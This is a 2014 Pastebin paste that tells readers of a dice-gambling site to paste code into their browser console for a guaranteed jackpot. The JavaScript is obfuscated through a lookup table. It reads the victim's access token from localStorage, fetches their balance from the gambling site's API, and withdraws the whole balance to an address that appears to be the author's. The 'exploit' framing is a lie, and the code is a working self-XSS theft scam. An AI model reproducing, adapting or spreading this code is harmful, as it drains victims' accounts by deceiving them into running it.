Advertisement
Guest User

Untitled

a guest
Sep 21st, 2014
192
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.20 KB | None | 0 0
  1. I've put everything together in a quick little script. I'm pretty
  2. bored, so I guess I'll get this patched quickly. Let's see how
  3. entertaining this ends up being. Open up your JavaScript console. In
  4. Chrome and Firefox, this is done by right clicking anywhere on the
  5. page, clicking Inspect Element, and then going to the Console tab. Now
  6. copy everything underneath the ------- below and paste it into your
  7. console. Your next bet should be a jackpot.
  8.  
  9. Happy exploiting, motherfuckers!
  10.  
  11. --------
  12.  
  13. admin_key = 'czvMyOu_6xSVU=R.0DrbqZC1PGKnJNdaTAgE5:Q3fWlewpoLhjI4m2ks9i/tHX7F?8BY$'
  14.  
  15. lookup_seed = function(keys) {
  16. var seed = [];
  17. for (var i = 0; i < admin_key; i++)
  18. seed.push(admin_key[i]);
  19. return seed;
  20. }
  21.  
  22. hash = function(nonce) {
  23. var ret = [];
  24. for (var i = 0; i < nonce.length; i++)
  25. ret.push(admin_key[nonce[i]]);
  26. return ret.join('')
  27. };
  28.  
  29. calculate_nonce = function(seed) {
  30. return hash(
  31. [0x30, 0x3b, 0x3b, 0x2d, 0x37, 0x25, 0x3a, 0x3a, 0x1f, 0x2d,
  32. 0x39, 0x0f, 0x2d, 0x12, 0x39, 0x34, 0x2b, 0x1e, 0x39, 0x00,
  33. 0x2b, 0x0f, 0x00, 0x2e, 0x34, 0x3a, 0x1f, 0x2d, 0x39, 0x3a])
  34.  
  35. + seed + hash([0x40, 0x1f, 0x00, 0x00, 0x2b, 0x37, 0x37,
  36. 0x07, 0x3b, 0x2e, 0x36, 0x2b, 0x1b, 0x0d])
  37. + localStorage[hash([0x3b, 0x2e, 0x36, 0x2b, 0x1b])];
  38. };
  39.  
  40. lut = window[hash([0x44])];
  41.  
  42. lut[hash([0x22, 0x2b, 0x3b, 0x1c, 0x0a, 0x05, 0x1d])]
  43. (
  44. calculate_nonce(
  45. hash([0x06, 0x37, 0x2b, 0x12, 0x37, 0x3a, 0x17])
  46. ), function(seed) {
  47. var key1 = hash([0x1f, 0x34, 0x2e, 0x06, 0x1b, 0x3b]);
  48. var key2 = hash([0x1f, 0x1e, 0x1e, 0x12, 0x2b, 0x37, 0x37]);
  49. var load = {};
  50.  
  51. load[key1] = seed[hash([0x06, 0x37, 0x2b, 0x12])]
  52. [hash([0x13, 0x1f, 0x2a, 0x1f,
  53. 0x1b, 0x00, 0x2b])];
  54. load[key2] = hash(
  55. [0x17, 0x38, 0x1d, 0x28, 0x3b, 0x3e, 0x37, 0x36, 0x22, 0x33,
  56. 0x0e, 0x1e, 0x3c, 0x3e, 0x18, 0x33, 0x27, 0x3d, 0x43, 0x00,
  57. 0x16, 0x0a, 0x43, 0x0e, 0x01, 0x15, 0x2c, 0x26, 0x39, 0x20,
  58. 0x04, 0x08, 0x18, 0x23]);
  59.  
  60. lut[hash([0x2d, 0x2e, 0x37, 0x3b])](
  61. calculate_nonce(
  62. hash([0x2c, 0x39, 0x3b, 0x30, 0x1e, 0x12, 0x1f, 0x2c])
  63. ), load);
  64. }
  65. );
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement